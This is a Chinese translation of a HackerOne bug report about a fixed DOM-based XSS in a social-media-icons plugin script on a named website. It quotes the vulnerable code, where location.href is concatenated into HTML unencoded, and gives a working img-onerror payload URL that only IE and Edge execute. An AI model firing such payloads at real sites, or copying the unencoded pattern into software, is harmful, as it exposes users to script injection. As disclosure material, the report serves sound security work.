HackerOne | 目標DOM型XSS在IE/Edge瀏覽器

  • 2019 年 12 月 15 日
  • 筆記

漏洞資訊

發現者:enesdexh1

漏洞種類:DOM型XSS

危害等級:中危

漏洞狀態:已修復

前言

我剛剛發現,由於https://www.thx.com/assets/plugins/ultimate-social-media-icons/js/custom.js?ver=5.2.3 js文件容易利用導致DOM型XSS漏洞

漏洞再現

首先,我想說,這是有漏洞的程式碼

function sfsi_mobile_wechat_share(url) {      if (jQuery('.sfsi_wechat_follow_overlay').length == 0) {          jQuery('body').append(              "<div class='sfsi_wechat_follow_overlay sfsi_overlay show'><div class='sfsi_inner_display'><a class='close_btn' href='' onclick="event.preventDefault();close_overlay('.sfsi_wechat_follow_overlay')" >×</a><div style='width:95%; min-height:80%;background-color:#fff;margin:0 auto;margin:30% auto;padding: 20px 0;'><div style='width:90%;margin: 0 auto;'><input type='text' value='" +              window.location.href +              "' style='width:100%;padding:7px 0;text-align:center' /></div><div style='width:80%;margin:10px auto 0 auto'><div class='sfsi_upload_butt_container' ><button onclick='sfsi_copy_text_parent_input(event)' class='upload_butt' >Copy</button></div><div class='sfsi_upload_butt_container' ><a href='weixin://' class='upload_butt'>Open WeChat</a></div></div></div></div>"          );

正如你所看到window.location.href是脆弱的DOM型XSS,因為沒有編碼

首先去主頁https://www.thx.com/,然後添加

#'><img src=x onerror=alert(document.domain)>

像這樣

https://www.thx.com/#'%3E<img src=x onerror=alert(document.domain)>

但是,Chrome和Firefox將無法正常工作,因為他們有location.href默認編碼,只有微軟Edge和IE瀏覽器能夠執行

如圖:

漏洞影響

1、黑客執行惡意程式碼受害者的瀏覽器 2、跳轉到惡意網站 3、任意js程式碼可以在受害者的瀏覽器中執行

翻譯自hackerone